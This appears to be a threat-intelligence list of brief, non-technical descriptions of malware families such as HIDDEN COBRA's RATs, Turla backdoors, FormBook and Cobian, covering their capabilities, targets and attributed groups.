A backdoor trojan used by HIDDEN COBRA since at least 2013 to maintain a presence on and further exploitation of the networks of organizations in the government, financial, automotive, and media industries.
A RAT used by HIDDEN COBRA since at least 2016 to exploit and maintain a presence on the networks of organizations within the aerospace, telecommunications, and finance industries.
A type of malware used concurrently with SunOrcal malware since at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants that communicate using either HTTP or raw TCP connections. The malware's final payload masquerades as a control panel link (CPL) file.
A banking trojan that conducts redirection attacks by installing a local proxy to redirect users to clone sites. It also conducts web injection attacks by injecting browser processes to show fake content over top of the legitimate page, to steal users' financial data.
A trojan used by APT28 as a first-stage malware deployed for conducting reconnaissance on a network before dropping a second-stage malware. The trojan profiles the victim by pulling host information and is often delivered via malicious email attachments in spearphishing emails.
A backdoor trojan used by the cyberespionage group REDBALDKNIGHT. The trojan allows threat actors to execute shell commands, download and upload data, take screenshots, and log keystrokes. It uses steganography to evade detection and retrieve a second-stage backdoor from its C2 server.
A trojan that can take repeated screenshots of a user's desktop quickly and has been used to aid threat actors in cyber-heists.
An infostealer trojan sold as a PHP control panel on an underground hacking forum since mid-July 2017. Users can rent FormBook for $29 per week, $59 per month, or $99 for three months or they can purchase it by paying a one-time fee of $299.
A remote access trojan (RAT) that communicates with its C2 server via Gmail to evade detection.
A remote access trojan used by a China-linked APT group to target Vietnamese organizations. It can upload, download, search for, delete, modify, copy, and rename files, among other capabilities.
A banking trojan whose code is taken from the Neutrino PoS malware and NukeBot trojan. It mines the Monero crytocurrency and can inject code into web pages and take screenshots.
A backdoor trojan associated with the China-linked cyber espionage group, DragonOK. The trojan allows threat actors to access the targeted system remotely and log keystrokes, capture screenshots, and access remote shell, among other capabilities.
A remote access trojan advertised for free on dark web forums as a trojan builder kit. Its author injected the trojan with a backdoor module that retrieves C2 information from a URL controlled by the author, allowing them to control all of the systems infected by the Cobian trojan generated via the builder kit.
A sophisticated backdoor trojan used by the Turla APT group as a second-stage backdoor. It avoids detection by wiping files securely, changing the strings and randomizing markers via different backdoor versions and uses its own customized library for 3DES and RSA encryption.
A sophisticated backdoor trojan known for its use by the advanced persistent threat (APT) Turla, an alleged Russian government-associated espionage group.
A backdoor trojan used by the Turla APT group and written using the Microsoft .NET Framework, proving the threat actors with complete access to the compromised devices and the ability to remotely load plugins for additional capabilities.
A backdoor trojan used by the Turla advanced persistent threat (APT) group as a first-stage backdoor to conduct reconnaissance.
An entirely fileless trojan malware likely infecting users' devices via malicious websites or a malware downloader and injected into the system via an autostart registry entry. It is mostly targeting users in the Asia-Pacific region.
Infy, later developed into Foudre, is an information-stealing trojan, using a keylogger and clipboard captures to steal data from targets in governments, businesses, and private citizens mainly in Iran, the United States, and Iraq.
An advanced, modular trojan that has infected victims, undetected, for about five years. Despite its advanced capabilities, the threat actors seem to be financially-motivated, using the malware for adware purposes. Most victims are Russian-speaking users.